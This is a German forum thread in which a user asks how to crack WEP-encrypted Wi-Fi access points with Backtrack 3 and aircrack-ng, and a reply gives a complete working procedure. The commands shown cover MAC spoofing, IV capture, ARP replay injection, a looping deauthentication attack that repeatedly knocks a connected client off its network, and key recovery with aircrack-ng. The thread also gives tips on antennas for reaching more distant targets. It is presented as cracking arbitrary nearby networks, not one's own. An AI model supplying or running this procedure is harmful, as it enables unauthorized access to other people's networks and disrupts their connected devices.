Backtrack 3 & C54RC

Infos:
Laptop: Thinkpad T40
OS: Backtrack 3
WLAN-Karte: Conceptronic C54RC PCMCIA (Treiber: rt61)

Hi,

ich hab mich heute mal mit dem cracken von WLAN-APs mit WEP-Verschlüsselung via Backtrack/Aircrack beschäftigt. Dabei bin ich allerdings auf folgende Hindernisse gestoßen und zwar klappt die Packet-Injection nicht wirklich! Ich muss verdammt nah am Router stehen, um erfolgreich eine Test via - airplay-ng -9 wlan0 - hinzubekommen. Eine Packet-Injection via - aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0 - klappt aber nie! Meine Fragen nun:

Wie kann ich die Reichweite erhöhen, damit ich auch weiter entfernte APs erreichen kann? (Packet-Injection)
Gibt es außer via aireplay-ng noch andere möglichkeiten die Daten zu erhöhen?
Welche Hardware könntet ihr mir denn empfehlen? (PCMCIA oder USB, bitte)
Gibt es für die C54RC vllt schon einen neueren bzw. besseren Treiber?

Bin für jeden Tipp dankbar! Bis dahin liebe grüße der freakazoid


Anhang:

Ablauf meines ersten Versuchs:
Code:
airmon-ng           			                       # Ausgabe der Wlan-Clients
               	   			                       # wlan0 rt61

airmon-ng stop wlan0  				               # Monitor-Funktion anstellen und Mac-Adresse ändern
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

airodump-ng wlan0     					       # nach APs suchen
airodump-ng -c 11 - test --bssid (bssid) wlan0  	       # Verbindung mit AP herstellen

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e test wlan0 # Funktioniert, aber nur sehr nah am Router
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0           # Leider noch nicht zum laufen bekommen :(
 
Ausser aireplay-ng kenne ich nichts, mit dem man ARP-Stürme auslösen kann. Bei mir hat sich folgendes immer bewährt:
Code:
airodump-ng --ivs --encrypt WEP -w $(date +%D-%M-%Y) -c XX wlan0
um die IVs zu dumpen, dabei ersetzt du XX natürlich durch den Channel den du monitoren willst und wlan0 durch dein Interface.
Parallel dazu in einem zweiten Terminal wird folgendes ausgeführt:
Code:
aireplay-ng -b XX -3 wlan0
wobei XX durch die MAC-Addresse vom Ziel-AP ersetzt wird.
Um dann noch die Anzahl der ARP-Requests zu erhöhen, lasse ich meistens in einem dritten Terminal folgendes laufen:
Code:
while true; do aireplay-ng -b XX -c YY -0 4 wlan0; sleep $((60 * 2)); done
XX wird wieder durch die MAC vom Ziel-AP ersetzt, YY durch einen mit dem AP verbundenen Client. Das ganze schickt immer wieder alle 2 Minuten 4 Disconnect Pakete an das Ziel, was bei Windows-Maschinen dazu führt, dass nach dem Neuverbinden der ARP-Cache geleert wird, was deine Chance erhöht, ein Paket zum Zurücksenden abzufangen.
Gleichzeitig dazu kommt natürlich in Terminal #4 folgendes zum Einsatz:
Code:
aircrack-ng *cap *ivs -cs -b XX
XX wird dabei mal wieder durch die MAC-Addresse vom Ziel-AP ersetzt.

Evtl. hilft dir das etwas weiter, wenn du eine definitiv funktionierende Methodik hast, um evtl. Fehler bei der Verwendung der Tools ausschliessen zu können.

//Edit:

Ich hab vergessen zu erwähnen:

1) Ich hab mit den integrierten Teilen von Intel (also iwl3945) sehr gute Erfahrungen gemacht.
2) Wenn die Datenrate zum AP für eine Paket-Injection zu gering ist, dann wirst du, selbst wenn du das Netz aufbrechen kannst, nicht viel Freude damit haben. Um wirklich an einem WLAN teilzunehmen brauchst du mehr Signalstärke als um einfach nur ab und an ein paar Pakete abzufangen und eigene rauszublasen.
3) Evtl. hat deine WLAN-Karte allerdings einen Anschluss für eine externe Antenne bzw. du kannst einen Anschluss anbringen (hab ich früher bei meiner Intersil Prism 1 auch gemacht, hat erstaunlich gut funktioniert) und eine Cantenna benutzen, um die Reichweite durch Richten des Signals zu erhöhen. Dafür solltest du dir aber ein Standbein für die Antenne organisieren, denn um genug Pakete zum knacken eines WEP-Keys zu bekommen (geht meistens bei ~50k IVs los), musst du einige Geduld aufbringen.
 
Zurück
Oben